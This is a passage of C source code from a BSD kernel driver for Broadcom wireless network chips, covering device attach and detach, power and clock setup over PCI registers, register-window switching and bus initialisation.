bwi_led_blink_next(void *); static void bwi_led_blink_end(void *); static const struct { uint16_t did_min; uint16_t did_max; uint16_t bbp_id; } bwi_bbpid_map[] = { { 0x4301, 0x4301, 0x4301 }, { 0x4305, 0x4307, 0x4307 }, { 0x4402, 0x4403, 0x4402 }, { 0x4610, 0x4615, 0x4610 }, { 0x4710, 0x4715, 0x4710 }, { 0x4720, 0x4725, 0x4309 } }; static const struct { uint16_t bbp_id; int nregwin; } bwi_regwin_count[] = { { 0x4301, 5 }, { 0x4306, 6 }, { 0x4307, 5 }, { 0x4310, 8 }, { 0x4401, 3 }, { 0x4402, 3 }, { 0x4610, 9 }, { 0x4704, 9 }, { 0x4710, 9 }, { 0x5365, 7 } }; #define CLKSRC(src) \ [BWI_CLKSRC_ ## src] = { \ .freq_min = BWI_CLKSRC_ ##src## _FMIN, \ .freq_max = BWI_CLKSRC_ ##src## _FMAX \ } static const struct { u_int freq_min; u_int freq_max; } bwi_clkfreq[BWI_CLKSRC_MAX] = { CLKSRC(LP_OSC), CLKSRC(CS_OSC), CLKSRC(PCI) }; #undef CLKSRC #define VENDOR_LED_ACT(vendor) \ { \ .vid = PCI_VENDOR_##vendor, \ .led_act = { BWI_VENDOR_LED_ACT_##vendor } \ } static const struct { #define PCI_VENDOR_COMPAQ 0x0e11 #define PCI_VENDOR_LINKSYS 0x1737 uint16_t vid; uint8_t led_act[BWI_LED_MAX]; } bwi_vendor_led_act[] = { VENDOR_LED_ACT(COMPAQ), VENDOR_LED_ACT(LINKSYS) #undef PCI_VENDOR_LINKSYS #undef PCI_VENDOR_COMPAQ }; static const uint8_t bwi_default_led_act[BWI_LED_MAX] = { BWI_VENDOR_LED_ACT_DEFAULT }; #undef VENDOR_LED_ACT static const struct { int on_dur; int off_dur; } bwi_led_duration[109] = { [0] = { 400, 100 }, [2] = { 150, 75 }, [4] = { 90, 45 }, [11] = { 66, 34 }, [12] = { 53, 26 }, [18] = { 42, 21 }, [22] = { 35, 17 }, [24] = { 32, 16 }, [36] = { 21, 10 }, [48] = { 16, 8 }, [72] = { 11, 5 }, [96] = { 9, 4 }, [108] = { 7, 3 } }; #ifdef BWI_DEBUG #ifdef BWI_DEBUG_VERBOSE static uint32_t bwi_debug = BWI_DBG_ATTACH | BWI_DBG_INIT | BWI_DBG_TXPOWER; #else static uint32_t bwi_debug; #endif TUNABLE_INT("hw.bwi.debug", (int *)&bwi_debug); #endif /* BWI_DEBUG */ static const uint8_t bwi_zero_addr[IEEE80211_ADDR_LEN]; uint16_t bwi_read_sprom(struct bwi_softc *sc, uint16_t ofs) { return CSR_READ_2(sc, ofs + BWI_SPROM_START); } static __inline void bwi_setup_desc32(struct bwi_softc *sc, struct bwi_desc32 *desc_array, int ndesc, int desc_idx, bus_addr_t paddr, int buf_len, int tx) { struct bwi_desc32 *desc = &desc_array[desc_idx]; uint32_t ctrl, addr, addr_hi, addr_lo; addr_lo = __SHIFTOUT(paddr, BWI_DESC32_A_ADDR_MASK); addr_hi = __SHIFTOUT(paddr, BWI_DESC32_A_FUNC_MASK); addr = __SHIFTIN(addr_lo, BWI_DESC32_A_ADDR_MASK) | __SHIFTIN(BWI_DESC32_A_FUNC_TXRX, BWI_DESC32_A_FUNC_MASK); ctrl = __SHIFTIN(buf_len, BWI_DESC32_C_BUFLEN_MASK) | __SHIFTIN(addr_hi, BWI_DESC32_C_ADDRHI_MASK); if (desc_idx == ndesc - 1) ctrl |= BWI_DESC32_C_EOR; if (tx) { /* XXX */ ctrl |= BWI_DESC32_C_FRAME_START | BWI_DESC32_C_FRAME_END | BWI_DESC32_C_INTR; } desc->addr = htole32(addr); desc->ctrl = htole32(ctrl); } int bwi_attach(struct bwi_softc *sc) { struct ieee80211com *ic; device_t dev = sc->sc_dev; struct ifnet *ifp; struct bwi_mac *mac; struct bwi_phy *phy; int i, error; uint8_t bands; uint8_t macaddr[IEEE80211_ADDR_LEN]; BWI_LOCK_INIT(sc); /* * Initialize taskq and various tasks */ sc->sc_tq = taskqueue_create("bwi_taskq", M_NOWAIT | M_ZERO, taskqueue_thread_enqueue, &sc->sc_tq); taskqueue_start_threads(&sc->sc_tq, 1, PI_NET, "%s taskq", device_get_nameunit(dev)); TASK_INIT(&sc->sc_restart_task, 0, bwi_restart, sc); callout_init_mtx(&sc->sc_calib_ch, &sc->sc_mtx, 0); /* * Initialize sysctl variables */ sc->sc_fw_version = BWI_FW_VERSION3; sc->sc_led_idle = (2350 * hz) / 1000; sc->sc_led_blink = 1; sc->sc_txpwr_calib = 1; #ifdef BWI_DEBUG sc->sc_debug = bwi_debug; #endif bwi_power_on(sc, 1); error = bwi_bbp_attach(sc); if (error) goto fail; error = bwi_bbp_power_on(sc, BWI_CLOCK_MODE_FAST); if (error) goto fail; if (BWI_REGWIN_EXIST(&sc->sc_com_regwin)) { error = bwi_set_clock_delay(sc); if (error) goto fail; error = bwi_set_clock_mode(sc, BWI_CLOCK_MODE_FAST); if (error) goto fail; error = bwi_get_pwron_delay(sc); if (error) goto fail; } error = bwi_bus_attach(sc); if (error) goto fail; bwi_get_card_flags(sc); bwi_led_attach(sc); for (i = 0; i < sc->sc_nmac; ++i) { struct bwi_regwin *old; mac = &sc->sc_mac[i]; error = bwi_regwin_switch(sc, &mac->mac_regwin, &old); if (error) goto fail; error = bwi_mac_lateattach(mac); if (error) goto fail; error = bwi_regwin_switch(sc, old, NULL); if (error) goto fail; } /* * XXX First MAC is known to exist * TODO2 */ mac = &sc->sc_mac[0]; phy = &mac->mac_phy; bwi_bbp_power_off(sc); error = bwi_dma_alloc(sc); if (error) goto fail; ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(dev, "can not if_alloc()\n"); error = ENOSPC; goto fail; } ic = ifp->if_l2com; /* set these up early for if_printf use */ if_initname(ifp, device_get_name(dev), device_get_unit(dev)); ifp->if_softc = sc; ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = bwi_init; ifp->if_ioctl = bwi_ioctl; ifp->if_start = bwi_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); callout_init_mtx(&sc->sc_watchdog_timer, &sc->sc_mtx, 0); /* * Setup ratesets, phytype, channels and get MAC address */ bands = 0; if (phy->phy_mode == IEEE80211_MODE_11B || phy->phy_mode == IEEE80211_MODE_11G) { setbit(&bands, IEEE80211_MODE_11B); if (phy->phy_mode == IEEE80211_MODE_11B) { ic->ic_phytype = IEEE80211_T_DS; } else { ic->ic_phytype = IEEE80211_T_OFDM; setbit(&bands, IEEE80211_MODE_11G); } bwi_get_eaddr(sc, BWI_SPROM_11BG_EADDR, macaddr); if (IEEE80211_IS_MULTICAST(macaddr)) { bwi_get_eaddr(sc, BWI_SPROM_11A_EADDR, macaddr); if (IEEE80211_IS_MULTICAST(macaddr)) { device_printf(dev, "invalid MAC address: %6D\n", macaddr, ":"); } } } else if (phy->phy_mode == IEEE80211_MODE_11A) { /* TODO:11A */ setbit(&bands, IEEE80211_MODE_11A); error = ENXIO; goto fail; } else { panic("unknown phymode %d\n", phy->phy_mode); } /* Get locale */ sc->sc_locale = __SHIFTOUT(bwi_read_sprom(sc, BWI_SPROM_CARD_INFO), BWI_SPROM_CARD_INFO_LOCALE); DPRINTF(sc, BWI_DBG_ATTACH, "locale: %d\n", sc->sc_locale); /* XXX use locale */ ieee80211_init_channels(ic, NULL, &bands); ic->ic_ifp = ifp; ic->ic_caps = IEEE80211_C_STA | IEEE80211_C_SHSLOT | IEEE80211_C_SHPREAMBLE | IEEE80211_C_WPA | IEEE80211_C_BGSCAN | IEEE80211_C_MONITOR; ic->ic_opmode = IEEE80211_M_STA; ieee80211_ifattach(ic, macaddr); ic->ic_headroom = sizeof(struct bwi_txbuf_hdr); /* override default methods */ ic->ic_vap_create = bwi_vap_create; ic->ic_vap_delete = bwi_vap_delete; ic->ic_raw_xmit = bwi_raw_xmit; ic->ic_updateslot = bwi_updateslot; ic->ic_scan_start = bwi_scan_start; ic->ic_scan_end = bwi_scan_end; ic->ic_set_channel = bwi_set_channel; sc->sc_rates = ieee80211_get_ratetable(ic->ic_curchan); ieee80211_radiotap_attach(ic, &sc->sc_tx_th.wt_ihdr, sizeof(sc->sc_tx_th), BWI_TX_RADIOTAP_PRESENT, &sc->sc_rx_th.wr_ihdr, sizeof(sc->sc_rx_th), BWI_RX_RADIOTAP_PRESENT); /* * Add sysctl nodes */ SYSCTL_ADD_INT(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "fw_version", CTLFLAG_RD, &sc->sc_fw_version, 0, "Firmware version"); SYSCTL_ADD_INT(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "led_idle", CTLFLAG_RW, &sc->sc_led_idle, 0, "# ticks before LED enters idle state"); SYSCTL_ADD_INT(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "led_blink", CTLFLAG_RW, &sc->sc_led_blink, 0, "Allow LED to blink"); SYSCTL_ADD_INT(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "txpwr_calib", CTLFLAG_RW, &sc->sc_txpwr_calib, 0, "Enable software TX power calibration"); #ifdef BWI_DEBUG SYSCTL_ADD_UINT(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "debug", CTLFLAG_RW, &sc->sc_debug, 0, "Debug flags"); #endif if (bootverbose) ieee80211_announce(ic); return (0); fail: BWI_LOCK_DESTROY(sc); return (error); } int bwi_detach(struct bwi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; int i; bwi_stop(sc, 1); callout_drain(&sc->sc_led_blink_ch); callout_drain(&sc->sc_calib_ch); callout_drain(&sc->sc_watchdog_timer); ieee80211_ifdetach(ic); for (i = 0; i < sc->sc_nmac; ++i) bwi_mac_detach(&sc->sc_mac[i]); bwi_dma_free(sc); if_free(ifp); taskqueue_free(sc->sc_tq); BWI_LOCK_DESTROY(sc); return (0); } static struct ieee80211vap * bwi_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct bwi_vap *bvp; struct ieee80211vap *vap; if (!TAILQ_EMPTY(&ic->ic_vaps)) /* only one at a time */ return NULL; bvp = (struct bwi_vap *) malloc(sizeof(struct bwi_vap), M_80211_VAP, M_WAITOK | M_ZERO); if (bvp == NULL) return NULL; vap = &bvp->bv_vap; /* enable s/w bmiss handling for sta mode */ ieee80211_vap_setup(ic, vap, name, unit, opmode, flags | IEEE80211_CLONE_NOBEACONS, bssid, mac); /* override default methods */ bvp->bv_newstate = vap->iv_newstate; vap->iv_newstate = bwi_newstate; #if 0 vap->iv_update_beacon = bwi_beacon_update; #endif ieee80211_ratectl_init(vap); /* complete setup */ ieee80211_vap_attach(vap, bwi_media_change, ieee80211_media_status); ic->ic_opmode = opmode; return vap; } static void bwi_vap_delete(struct ieee80211vap *vap) { struct bwi_vap *bvp = BWI_VAP(vap); ieee80211_ratectl_deinit(vap); ieee80211_vap_detach(vap); free(bvp, M_80211_VAP); } void bwi_suspend(struct bwi_softc *sc) { bwi_stop(sc, 1); } void bwi_resume(struct bwi_softc *sc) { struct ifnet *ifp = sc->sc_ifp; if (ifp->if_flags & IFF_UP) bwi_init(sc); } int bwi_shutdown(struct bwi_softc *sc) { bwi_stop(sc, 1); return 0; } static void bwi_power_on(struct bwi_softc *sc, int with_pll) { uint32_t gpio_in, gpio_out, gpio_en; uint16_t status; gpio_in = pci_read_config(sc->sc_dev, BWI_PCIR_GPIO_IN, 4); if (gpio_in & BWI_PCIM_GPIO_PWR_ON) goto back; gpio_out = pci_read_config(sc->sc_dev, BWI_PCIR_GPIO_OUT, 4); gpio_en = pci_read_config(sc->sc_dev, BWI_PCIR_GPIO_ENABLE, 4); gpio_out |= BWI_PCIM_GPIO_PWR_ON; gpio_en |= BWI_PCIM_GPIO_PWR_ON; if (with_pll) { /* Turn off PLL first */ gpio_out |= BWI_PCIM_GPIO_PLL_PWR_OFF; gpio_en |= BWI_PCIM_GPIO_PLL_PWR_OFF; } pci_write_config(sc->sc_dev, BWI_PCIR_GPIO_OUT, gpio_out, 4); pci_write_config(sc->sc_dev, BWI_PCIR_GPIO_ENABLE, gpio_en, 4); DELAY(1000); if (with_pll) { /* Turn on PLL */ gpio_out &= ~BWI_PCIM_GPIO_PLL_PWR_OFF; pci_write_config(sc->sc_dev, BWI_PCIR_GPIO_OUT, gpio_out, 4); DELAY(5000); } back: /* Clear "Signaled Target Abort" */ status = pci_read_config(sc->sc_dev, PCIR_STATUS, 2); status &= ~PCIM_STATUS_STABORT; pci_write_config(sc->sc_dev, PCIR_STATUS, status, 2); } static int bwi_power_off(struct bwi_softc *sc, int with_pll) { uint32_t gpio_out, gpio_en; pci_read_config(sc->sc_dev, BWI_PCIR_GPIO_IN, 4); /* dummy read */ gpio_out = pci_read_config(sc->sc_dev, BWI_PCIR_GPIO_OUT, 4); gpio_en = pci_read_config(sc->sc_dev, BWI_PCIR_GPIO_ENABLE, 4); gpio_out &= ~BWI_PCIM_GPIO_PWR_ON; gpio_en |= BWI_PCIM_GPIO_PWR_ON; if (with_pll) { gpio_out |= BWI_PCIM_GPIO_PLL_PWR_OFF; gpio_en |= BWI_PCIM_GPIO_PLL_PWR_OFF; } pci_write_config(sc->sc_dev, BWI_PCIR_GPIO_OUT, gpio_out, 4); pci_write_config(sc->sc_dev, BWI_PCIR_GPIO_ENABLE, gpio_en, 4); return 0; } int bwi_regwin_switch(struct bwi_softc *sc, struct bwi_regwin *rw, struct bwi_regwin **old_rw) { int error; if (old_rw != NULL) *old_rw = NULL; if (!BWI_REGWIN_EXIST(rw)) return EINVAL; if (sc->sc_cur_regwin != rw) { error = bwi_regwin_select(sc, rw->rw_id); if (error) { device_printf(sc->sc_dev, "can't select regwin %d\n", rw->rw_id); return error; } } if (old_rw != NULL) *old_rw = sc->sc_cur_regwin; sc->sc_cur_regwin = rw; return 0; } static int bwi_regwin_select(struct bwi_softc *sc, int id) { uint32_t win = BWI_PCIM_REGWIN(id); int i; #define RETRY_MAX 50 for (i = 0; i < RETRY_MAX; ++i) { pci_write_config(sc->sc_dev, BWI_PCIR_SEL_REGWIN, win, 4); if (pci_read_config(sc->sc_dev, BWI_PCIR_SEL_REGWIN, 4) == win) return 0; DELAY(10); } #undef RETRY_MAX return ENXIO; } static void bwi_regwin_info(struct bwi_softc *sc, uint16_t *type, uint8_t *rev) { uint32_t val; val = CSR_READ_4(sc, BWI_ID_HI); *type = BWI_ID_HI_REGWIN_TYPE(val); *rev = BWI_ID_HI_REGWIN_REV(val); DPRINTF(sc, BWI_DBG_ATTACH, "regwin: type 0x%03x, rev %d, " "vendor 0x%04x\n", *type, *rev, __SHIFTOUT(val, BWI_ID_HI_REGWIN_VENDOR_MASK)); } static int bwi_bbp_attach(struct bwi_softc *sc) { #define N(arr) (int)(sizeof(arr) / sizeof(arr[0])) uint16_t bbp_id, rw_type; uint8_t rw_rev; uint32_t info; int error, nregwin, i; /* * Get 0th regwin information * NOTE: 0th regwin should exist */ error = bwi_regwin_select(sc, 0); if (error) { device_printf(sc->sc_dev, "can't select regwin 0\n"); return error; } bwi_regwin_info(sc, &rw_type, &rw_rev); /* * Find out BBP id */ bbp_id = 0; info = 0; if (rw_type == BWI_REGWIN_T_COM) { info = CSR_READ_4(sc, BWI_INFO); bbp_id = __SHIFTOUT(info, BWI_INFO_BBPID_MASK); BWI_CREATE_REGWIN(&sc->sc_com_regwin, 0, rw_type, rw_rev); sc->sc_cap = CSR_READ_4(sc, BWI_CAPABILITY); } else { for (i = 0; i < N(bwi_bbpid_map); ++i) { if (sc->sc_pci_did >= bwi_bbpid_map[i].did_min && sc->sc_pci_did <= bwi_bbpid_map[i].did_max) { bbp_id = bwi_bbpid_map[i].bbp_id; break; } } if (bbp_id == 0) { device_printf(sc->sc_dev, "no BBP id for device id " "0x%04x\n", sc->sc_pci_did); return ENXIO; } info = __SHIFTIN(sc->sc_pci_revid, BWI_INFO_BBPREV_MASK) | __SHIFTIN(0, BWI_INFO_BBPPKG_MASK); } /* * Find out number of regwins */ nregwin = 0; if (rw_type == BWI_REGWIN_T_COM && rw_rev >= 4) { nregwin = __SHIFTOUT(info, BWI_INFO_NREGWIN_MASK); } else { for (i = 0; i < N(bwi_regwin_count); ++i) { if (bwi_regwin_count[i].bbp_id == bbp_id) { nregwin = bwi_regwin_count[i].nregwin; break; } } if (nregwin == 0) { device_printf(sc->sc_dev, "no number of win for " "BBP id 0x%04x\n", bbp_id); return ENXIO; } } /* Record BBP id/rev for later using */ sc->sc_bbp_id = bbp_id; sc->sc_bbp_rev = __SHIFTOUT(info, BWI_INFO_BBPREV_MASK); sc->sc_bbp_pkg = __SHIFTOUT(info, BWI_INFO_BBPPKG_MASK); device_printf(sc->sc_dev, "BBP: id 0x%04x, rev 0x%x, pkg %d\n", sc->sc_bbp_id, sc->sc_bbp_rev, sc->sc_bbp_pkg); DPRINTF(sc, BWI_DBG_ATTACH, "nregwin %d, cap 0x%08x\n", nregwin, sc->sc_cap); /* * Create rest of the regwins */ /* Don't re-create common regwin, if it is already created */ i = BWI_REGWIN_EXIST(&sc->sc_com_regwin) ? 1 : 0; for (; i < nregwin; ++i) { /* * Get regwin information */ error = bwi_regwin_select(sc, i); if (error) { device_printf(sc->sc_dev, "can't select regwin %d\n", i); return error; } bwi_regwin_info(sc, &rw_type, &rw_rev); /* * Try attach: * 1) Bus (PCI/PCIE) regwin * 2) MAC regwin * Ignore rest types of regwin */ if (rw_type == BWI_REGWIN_T_BUSPCI || rw_type == BWI_REGWIN_T_BUSPCIE) { if (BWI_REGWIN_EXIST(&sc->sc_bus_regwin)) { device_printf(sc->sc_dev, "bus regwin already exists\n"); } else { BWI_CREATE_REGWIN(&sc->sc_bus_regwin, i, rw_type, rw_rev); } } else if (rw_type == BWI_REGWIN_T_MAC) { /* XXX ignore return value */ bwi_mac_attach(sc, i, rw_rev); } } /* At least one MAC shold exist */ if (!BWI_REGWIN_EXIST(&sc->sc_mac[0].mac_regwin)) { device_printf(sc->sc_dev, "no MAC was found\n"); return ENXIO; } KASSERT(sc->sc_nmac > 0, ("no mac's")); /* Bus regwin must exist */ if (!BWI_REGWIN_EXIST(&sc->sc_bus_regwin)) { device_printf(sc->sc_dev, "no bus regwin was found\n"); return ENXIO; } /* Start with first MAC */ error = bwi_regwin_switch(sc, &sc->sc_mac[0].mac_regwin, NULL); if (error) return error; return 0; #undef N } int bwi_bus_init(struct bwi_softc *sc, struct bwi_mac *mac) { struct bwi_regwin *old, *bus; uint32_t val; int error; bus = &sc->sc_bus_regwin; KASSERT(sc->sc_cur_regwin == &mac->mac_regwin, ("not cur regwin")); /* * Tell bus to generate requested interrupts */ if (bus->rw_rev < 6 && bus->rw_type == BWI_REGWIN_T_BUSPCI) { /* * NOTE: Read BWI_FLAGS from MAC regwin */ val = CSR_READ_4(sc, BWI_FLAGS); error = bwi_regwin_switch(sc, bus, &old); if (error) return error; CSR_SETBITS_4(sc, BWI_INTRVEC, (val & BWI_FLAGS_INTR_MASK)); } else { uint32_t mac_mask; mac_mask = 1 << mac->mac_id; error = bwi_regwin_switch(sc, bus, &old); if (error) return error; val = pci_read_config(sc->sc_dev, BWI_PCIR_INTCTL, 4); val |= mac_mask << 8; pci_write_config(sc->sc_dev, BWI_PCIR_INTCTL, val, 4); } if (sc->sc_flags & BWI_F_BUS_INITED) goto back; if (bus->rw_type == BWI_REGWIN_T_BUSPCI) { /* * Enable prefetch and burst */ CSR_SETBITS_4(sc, BWI_BUS_CONFIG, BWI_BUS_CONFIG_PREFETCH | BWI_BUS_CONFIG_BURST); if (bus->rw_rev < 5) { struct bwi_regwin *com = &sc->sc_com_regwin; /* * Configure timeouts for bus operation */ /* * Set service timeout and request timeout */ CSR_SETBITS_4(sc, BWI_CONF_LO, __SHIFTIN(BWI_CONF_LO_SERVTO, BWI_CONF_LO_SERVTO_MASK) | __SHIFTIN(BWI_CONF_LO_REQTO, BWI_CONF_LO_REQTO_MASK)); /* * If there is common regwin, we switch to that regwin * and switch back to bus regwin once we have done. */ if (BWI_REGWIN_EXIST(com)) { error = bwi_regwin_switch(sc, com, NULL); if (error) return error; } /* Let bus know what we have changed */ CSR_WRITE_4(sc, BWI_BUS_ADDR, BWI_BUS_ADDR_MAGIC); CSR_READ_4(sc, BWI_BUS_ADDR); /* Flush */ CSR_WRITE_4(sc, BWI_BUS_DATA, 0); CSR_READ_4(sc, BWI_BUS_DATA); /* Flush */ if (BWI_REGWIN_EXIST(com)) { error = bwi_regwin_switch(sc, bus, NULL); if (error) return error; } } else if (bus->rw_rev >= 11) { /* * Enable memory read multiple */ CSR_SETBITS_4(sc, BWI_BUS_CONFIG, BWI_BUS_CONFIG_MRM); } } else { /* TODO:PCIE */ } sc->sc_flags |= BWI_F_BUS_INITED; back: return bwi_regwin_switch(sc, old, NULL); } static void bwi_get_card_flags(struct bwi_softc *sc) { #define PCI_VENDOR_APPLE 0x106b #define PCI_VENDOR_DELL 0x1028 sc->sc_card_flags = bwi_read_sprom(sc, BWI_SPROM_CARD_FLAGS); if (sc->sc_card_flags == 0xffff) sc->sc_card_flags = 0; if (sc->sc_pci_subvid == PCI_VENDOR_DELL && sc->sc_bbp_id == BWI_BBPID_BCM4301 && sc->sc_pci_revid == 0x74) sc->sc_card_flags |= BWI_CARD_F_BT_COEXIST; if (sc->sc_pci_subvid == PCI_VENDOR_APPLE && sc->sc_pci_subdid == 0x4e && /* XXX */ sc->sc_pci_revid > 0x40) sc->sc_card_flags |= BWI_CARD_F_PA_GPIO9; DPRINTF(sc, BWI_DBG_ATTACH, "card flags 0x%04x\n", sc->sc_card_flags); #undef PCI_VENDOR_DELL #undef PCI_VENDOR_APPLE } static void bwi_get_eaddr(struct bwi_softc *sc, uint16_t eaddr_ofs, uint8_t *eaddr) { int i; for (i = 0; i < 3; ++i) { *((uint16_t *)eaddr + i) = htobe16(bwi_read_sprom(sc, eaddr_ofs + 2 * i)); } } static void bwi_get_clock_freq(struct bwi_softc *sc, struct bwi_clock_freq *freq) { struct bwi_regwin *com; uint32_t val; u_int div; int src; bzero(freq, sizeof(*freq)); com = &sc->sc_com_regwin; KASSERT(BWI_REGWIN_EXIST(com), ("regwin does not exist")); KASSERT(sc->sc_cur_regwin == com, ("wrong regwin")); KASSERT(sc->sc_cap & BWI_CAP_CLKMODE, ("wrong clock mode")); /* * Calculate clock frequency */ src = -1; div = 0; if (com->rw_rev < 6) { val = pci_read_config(sc->sc_dev, BWI_PCIR_GPIO_OUT, 4); if (val & BWI_PCIM_GPIO_OUT_CLKSRC) { src = BWI_CLKSRC_PCI; div = 64; } else { src = BWI_CLKSRC_CS_OSC; div = 32; } } else if (com->rw_rev < 10) { val = CSR_READ_4(sc, BWI_CLOCK_CTRL); src = __SHIFTOUT(val, BWI_CLOCK_CTRL_CLKSRC); if (src == BWI_CLKSRC_LP_OSC) { div = 1; } else { div = (__SHIFTOUT(val, BWI_CLOCK_CTRL_FDIV) + 1) << 2; /* Unknown source */ if (src >= BWI_CLKSRC_MAX) src = BWI_CLKSRC_CS_OSC; } } else { val = CSR_READ_4(sc, BWI_CLOCK_INFO); src = BWI_CLKSRC_CS_OSC; div = (__SHIFTOUT(val, BWI_CLOCK_INFO_FDIV) + 1) << 2; } KASSERT(src >= 0 && src < BWI_CLKSRC_MAX, ("bad src %d", src)); KASSERT(div != 0, ("div zero")); DPRINTF(sc, BWI_DBG_ATTACH, "clksrc %s\n", src == BWI_CLKSRC_PCI ? "PCI" : (src == BWI_CLKSRC_LP_OSC ? "LP_OSC" : "CS_OSC")); freq->clkfreq_min = bwi_clkfreq[src].freq_min / div; freq->clkfreq_max = bwi_clkfreq[src].freq_max / div; DPRINTF(sc, BWI_DBG_ATTACH, "clkfreq min %u, max %u\n", freq->clkfreq_min, freq->clkfreq_max); } static int bwi_set_clock_mode(struct bwi_softc *sc, enum bwi_clock_mode clk_mode) { struct bwi_regwin *old, *com; uint32_t clk_ctrl, clk_src; int error, pwr_off = 0; com = &sc->sc_com_regwin; if (!BWI_REGWIN_EXIST(com)) return 0; if (com->rw_rev >= 10 || com->rw_rev < 6) return 0; /* * For common regwin whose rev is [6, 10), the chip * must be capable to change clock mode. */ if ((sc->sc_cap & BWI_CAP_CLKMODE) == 0) return 0; error = bwi_regwin_switch(sc, com, &old); if (error) return error; if (clk_mode == BWI_CLOCK_MODE_FAST) bwi_power_on(sc, 0); /* Don't turn on PLL */ clk_ctrl = CSR_READ_4(sc, BWI_CLOCK_CTRL); clk_src = __SHIFTOUT(clk_ctrl, BWI_CLOCK_CTRL_CLKSRC); switch (clk_mode) { case BWI_CLOCK_MODE_FAST: clk_ctrl &= ~BWI_CLOCK_CTRL_SLOW; clk_ctrl |= BWI_CLOCK_CTRL_IGNPLL; break; case BWI_CLOCK_MODE_SLOW: clk_ctrl |= BWI_CLOCK_CTRL_SLOW; break; case BWI_CLOCK_MODE_DYN: clk_ctrl &= ~(BWI_CLOCK_CTRL_SLOW | BWI_CLOCK_CTRL_IGNPLL | BWI_CLOCK_CTRL_NODYN); if (clk_src != BWI_CLKSRC_CS_OSC) { clk_ctrl |= BWI_CLOCK_CTRL_NODYN; pwr_off = 1; } break; } CSR_WRITE_4(sc, BWI_CLOCK_CTRL, clk_ctrl); if (pwr_off) bwi_power_off(sc, 0); /* Leave PLL as it is */ return bwi_regwin_switch(sc, old, NULL); } static int bwi_set_clock_delay(struct bwi_softc *sc) { struct bwi_regwin *old, *com; int error; com = &sc->sc_com_regwin; if (!BWI_REGWIN_EXIST(com)) return 0; error = bwi_regwin_switch(sc, com, &old); if (error) return error; if (sc->sc_bbp_id == BWI_BBPID_BCM4321) { if (sc->sc_bbp_rev == 0) CSR_WRITE_4(sc, BWI_CONTROL, BWI_CONTROL_MAGIC0); else if (sc->sc_bbp_rev == 1) CSR_WRITE_4(sc, BWI_CONTROL, BWI_CONTROL_MAGIC1); } if (sc->sc_cap & BWI_CAP_CLKMODE) { if (com->rw_rev >= 10) { CSR_FILT_SETBITS_4(sc, BWI_CLOCK_INFO, 0xffff, 0x40000); } else { struct bwi_clock_freq freq; bwi_get_clock_freq(sc, &freq); CSR_WRITE_4(sc, BWI_PLL_ON_DELAY, howmany(freq.clkfreq_max * 150, 1000000)); CSR_WRITE_4(sc, BWI_FREQ_SEL_DELAY, howmany(freq.clkfreq_max * 15, 1000000)); } } return bwi_regwin_switch(sc, old, NULL); } static void bwi_init(void *xsc) { struct bwi_softc *sc = xsc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; BWI_LOCK(sc); bwi_init_statechg(sc, 1); BWI_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); /* start all vap's */ } static void bwi_init_statechg(struct bwi_softc *sc, int statechg) { struct ifnet *ifp = sc->sc_ifp; struct bwi_mac *mac; int error; bwi_stop_locked(sc, statechg); bwi_bbp_power_on(sc, BWI_CLOCK_MODE_FAST); /* TODO: 2 MAC */ mac = &sc->sc_mac[0]; error = bwi_regwin_switch(sc, &mac->mac_regwin, NULL); if (error) { if_printf(ifp, "%s: error %d on regwin switch\n", __func__, error); goto bad; } error = bwi_mac_init(mac); if (error) { if_printf(ifp, "%s: error %d on MAC init\n", __func__, error); goto bad; } bwi_bbp_power_on(sc, BWI_CLOCK_MODE_DYN); bwi_set_bssid(sc, bwi_zero_addr); /* Clear BSSID */ bwi_set_addr_filter(sc, BWI_ADDR_FILTER_MYADDR, IF_LLADDR(ifp)); bwi_mac_reset_hwkeys(mac); if ((mac->mac_flags & BWI_MAC_F_HAS_TXSTATS) == 0) { int i; #define NRETRY 1000 /* * Drain any possible pending TX status */ for (i = 0; i < NRETRY; ++i) { if ((CSR_READ_4(sc, BWI_TXSTATUS0) & BWI_TXSTATUS0_VALID) == 0) break; CSR_READ_4(sc, BWI_TXSTATUS1); } if (i == NRETRY) if_printf(ifp, "%s: can't drain TX status\n", __func__); #undef NRETRY } if (mac->mac_phy.phy_mode == IEEE80211_MODE_11G) bwi_mac_updateslot(mac, 1); /* Start MAC */ error = bwi_mac_start(mac); if (error) { if_printf(ifp, "%s: error %d starting MAC\n", __func__, error); goto bad; } /* Clear stop flag before enabling interrupt */ sc->sc_flags &= ~BWI_F_STOP; ifp->if_drv_flags |= IFF_DRV_RUNNING; callout_reset(&sc->sc_watchdog_timer, hz, bwi_watchdog, sc); /* Enable intrs */ bwi_enable_intrs(sc, BWI_INIT_INTRS); return; bad: bwi_stop_locked(sc, 1); } static int bwi_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { #define IS_RUNNING(ifp) \ ((ifp->if_flags & IFF_UP) && (ifp->if_drv_flags & IFF_DRV_RUNNING)) struct bwi_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int error = 0, startall = 0; switch (cmd) { case SIOCSIFFLAGS: BWI_LOCK(sc); if (IS_RUNNING(ifp)) { struct bwi_mac *mac; int promisc = -1; KASSERT(sc->sc_cur_regwin->rw_type == BWI_REGWIN_T_MAC, ("current regwin type %d", sc->sc_cur_regwin->rw_type)); mac = (struct bwi_mac 